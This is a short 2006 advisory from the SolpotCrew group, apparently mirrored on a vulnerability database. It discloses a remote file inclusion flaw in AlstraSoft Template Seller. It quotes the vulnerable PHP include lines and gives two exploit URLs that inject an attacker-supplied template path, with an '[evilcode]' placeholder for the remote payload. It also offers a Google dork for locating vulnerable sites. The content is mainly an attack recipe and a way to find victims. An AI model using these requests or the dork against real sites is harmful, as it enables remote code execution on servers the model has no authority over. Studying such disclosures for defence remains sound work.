Lucene search
SecurityvulnsSECURITYVULNS:DOC:14157HistorySep 06, 2006 - 12:00 a.m.
SolpotCrew Advisory #7 - AlstraSoft Template Seller Remote File Include Vulnerability
2006-09-0600:00:00
vulners.com
25
#############################SolpotCrew Community################################
AlstraSoft Template Seller Remote File Include Vulnerability
Download file : http://www.alstrasoft.com/template.htm
#################################################################################
Bug Found By : NoGe a.k.a da_jackass
contact: [email protected]
Website : http://nyubicrew.org/adv/Noge_adv_01.txt
################################################################################
Greetz: skulmatic[thanks for sharing knowledge] h4ntu[for the video] olibekas solpotcrew PremanMedan
yooogy[pa bozz] siwa^lima sagu mousekill ilalang13
#papmahackerlink #nyubi #maluku-hacker #papuahacker
###############################################################################
Vulnerable found in
payment_result.php and spuser_result.php
line 6 include("$config[template_path]/onlyheader.php");
line 7 include("$config[template_path]/onlysearch.php");
Exploit
/payment/payment_result.php?config[template_path]=[evilcode]
/payment/spuser_result.php?config[template_path]=[evilcode]
google dork
"Powered by AlstraSoft Template Seller"
######################################E.O.F##################################